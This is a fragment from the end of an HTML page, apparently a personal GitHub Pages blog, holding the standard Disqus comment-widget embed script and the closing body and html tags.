          var d = document, s = d.createElement('script');
          var disqus_shortname = 'https-hug0vincent-github-io';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  




    
  </body>
</html>

